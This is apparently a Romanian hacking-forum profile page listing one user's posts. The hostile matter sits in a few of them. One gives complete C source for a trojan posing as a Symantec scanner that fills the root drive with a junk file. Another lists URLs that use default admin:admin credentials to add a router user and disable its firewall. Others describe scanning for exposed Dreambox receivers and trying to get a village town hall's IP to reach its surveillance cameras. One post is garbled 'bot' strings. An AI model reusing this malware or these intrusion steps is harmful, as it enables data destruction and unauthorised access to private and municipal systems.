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Everything posted by al3x4ndru

  1. @off:Chivas - bleach... Extensia merge bine pe mozila, pe chrome mai scartie...
  2. mai poti sa-l pui pe hybernate si sa pui o melodie la task scheduler;e mai simplu.
  3. multumesc... o sa te tin la curent
  4. dar nu ma descurc cu php...
  5. Vreau sa fac un mini portal care sa cuprinda o camera de chat ,galerii de imagini ,filmulete si altele.Html si Css stiu destul de bine,dar ajax,asp si php mai deloc, de aceea vreau sa folosesc un cms.Unii mi-au spus de php-nuke ,altii de joomla,altii sa-mi fac eu propriul cms ca e mai sigur.Am cautat si pe google si am vazut ca fiecare are avantaje si dezavantaje.Mai rau m-am incurcat ,asa ca va intreb pe voi...
  6. am vrut sa fac si eu asa ,dar ma gandeam ca se vor supara.
  7. http://www.nemesis-security.com/Residential.aspx
  8. #include<stdio.h> #include<conio.h> #include<dos.h> #include<stdlib.h> FILE *a,*t,*b; int r,status,vir_count; double i; char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice; void eatspace(void); void findroot(void); void showstatus(void); void draw(void); void accept(void); void main() { draw(); accept(); textcolor(WHITE); draw(); gotoxy(12,8); cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT..."); sleep(3); gotoxy(12,8); delline(); cputs("PRESS ANY KEY TO START THE SYSTEM SCAN..."); getch(); gotoxy(12,8); delline(); findroot(); } void accept() { textcolor(LIGHTRED); gotoxy(1,8); cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT."); if((choice=getch())!=13) exit(0); } void draw() { clrscr(); textcolor(WHITE); gotoxy(12,2); cputs("********************************************************"); gotoxy(12,6); cputs("********************************************************"); gotoxy(12,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(67,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(14,4); cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)"); } void findroot() { t=fopen("C:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); textcolor(WHITE); a=fopen("C:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("C:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("D:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("D:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("D:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("E:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("E:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("E:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("F:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("F:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("F:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } if(t==NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM."); getch(); exit(1); } exit(1); } void eatspace() { textcolor(LIGHTRED); gotoxy(12,16); cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n"); textcolor(WHITE); gotoxy(12,18); while(1) { for(r=1;r<4;r++) { for(i=1;i<900000;i++) { status=fputs(ch,; if(status==EOF) { textcolor(WHITE); vir_count=random(120); draw(); gotoxy(12,8); cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count); gotoxy(12,10); cprintf("PRESS ANY KEY TO CLOSE..."); getch(); break; } } cputs("."); if(status==EOF) break; } if(status==EOF) break; } exit(0); } void showstatus() { gotoxy(12,8); cputs("SCANNING THE SYSTEM FOR THREATS"); gotoxy(12,10); cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS"); gotoxy(12,13); cputs("SCAN IN PROGRESS. PLEASE WAIT..."); }
  9. topicul este destul de vechi! Sunt cazuri in care accesul la browser este interzis(firme,scoala) si astfel se poate folosi aceasta alternativa! daca accesul la browser este limitat sau interzis ,nu se poate folosi nici windows explorer ,deoarece este folosit tot motorul de randare a lui i.e. ,in timp ce aplicatia help are propriul motor de randare( mult inferior chiar si lui I.E ).
  10. http://chinabanks.mobi/ daca intrati aici se descarcaun fisier cu numele index.php! de ce?
  11. si nu merg nici astea : CON Keyboard and display PRN System list device, usually a parallel port AUX Auxiliary device, usually a serial port CLOCK$ System real-time clock NUL Bit-bucket device A:-Z: Drive letters COM1 First serial communications port LPT1 First parallel printer port LPT2 Second parallel printer port LPT3 Third parallel printer port COM2 Second serial communications port COM3 Third serial communications port COM4 Fourth serial communications port deoarec MS-DOS rezerve anumite nume pentru drivere de dispozitiv de sistem. dar cu o comanda : mkdir C:\con\ merge.
  12. cativa boti! psuvxxxzzzzAA:moooqqqss LOQQSTTTTVVVWWWWWYYYYbbb:hhiiikkkmmmmooooo LQSSTVVVVWWWWYYYYbbbbccc:fhhiii Wcefhhjjjjkkkkmmmmnnnnpppprrrr:bbdddfffhhhhjjjjllllmmmmoooooq LQRRVVWWWWYYYYaaaacccce:aacceeeegggghh ortvwwyyyyz:ikkkmmm BGHJKKMMMMOOOOPPPP:zzbbddddffffhh puwxBBBBCCCC:jlllnnnpppprrrrtttt MPQSUUVVVVXXXXYYYYbbbbd:qsssuuuwwww ejllmoo:prrrtttvvvwwwwwyyyy111 GJLMOOQQQQRRRRTTTTUU:24446668888aaaacccceeeegggg zEGGHHJJJJKKKKMMM:yy11333355557777aaaacccce tyABDDDFFFFGGGG:mmoooqqq Uabdffgggggiiiijjjjllllnnnno:355577aaaacccceeeegggghhhhjj DHJLMMMMOOOOPPPPRRR:vvvxxxzzz222223333555577 DIJJLMMMOOOOQQQQRRR:z2244466688888bbbbcccceeee GLNOQSSSSTTTTVVVVWWWW:7acceeggggiiiijjjjlllllnnnnpp Wcefhhiiiikkkkmmmmnnnnppppqqq:kmmooqqq chjjkmmmmnnnpppprrrrsssssuuuuvv:uuwwwyyyy11113333444446 kqssuvvvvx:qqsssuuuvv mai fac si mai pun!
  13. prin intermediul acestor modemuri se poate da un ddos ,deoarece au deschis si portul 23 (telnet). alte chestii pentru a adauga un user : http://admin:admin@ip_vulnerabil/Action?user_id=rst_center&priv=1&pass1=parola1&pass2=parola2&id=70 dezactivare firewall http://admin:admin@ip_vulnerabil/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 adaugare ip sa treaca de firewall http://admin:admin@ip_vulnerabil/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gatew http://www.milw0rm.com
  14. site-ul este hostat la vodafone si nu a mai fost updatat din 2006 . O sa le fac o vizita...
  15. Primaria corbu are multe camere de supraveghere raspandite prin sat... De asta ma intereseaza sa aflu ip-urile pe care le foloseste!
  16. Vreau sa aflu ip-ul pe care il foloseste primaria din comuna corbu judet constanta!Le-am trimis mail cu readnotify.com dar nu l-au deschis inca!Cum sa fac?
  17. Dreamboxurile sunt o categorie de receivere digitale(pentru receptionarea semnalului tv de la sateliti)pe care se pot instala imagini linux.Aceste receivere se conecteaza la routerul casei pentru a avea acces la internet de unde isi descarca pluginuri teme si altele. azi dimineata scanam niste ip-uri si am gasit Enigma Web Interface - PLi Edition [Dreambox]. Este un receiver dreambox conectat la internet. Aici este telecomanda Remote Control pe care o puteti folosi si asta este streamul:
  18. site-ul este vulnerabil la xss
  19. al3x4ndru


    Haideti sa facem o revista lunara in format pdf in care sa publicam informatii despre securitatea informatica!Cum fac cei de aici
  20. Ubuntu to BackTrack in a few easy steps - Remote Exploit Forums Parerea mea este sa-l lasi tot pe 32 biti.Dincolo de avantajele putin cunoscute ale procesoarelor pe 64,cele pe 32 au mai multa stabilitate.Si oricum intel si amd nu au de gand sa renunte la 32.
  21. pana ieri am avut bitdefender si comodo ca firewall . Cu toate aste imi mergea foarte greu conexiunea la internet . am intrat in cmd si am dat un netstat ;erau foarte multe conexiuni cu ip-uri din iordania ,iran,china pe diverse porturi.Mi-am adus aminte ca am o licenta de kasperski si l-am instalat.Acum e mult mai bine.
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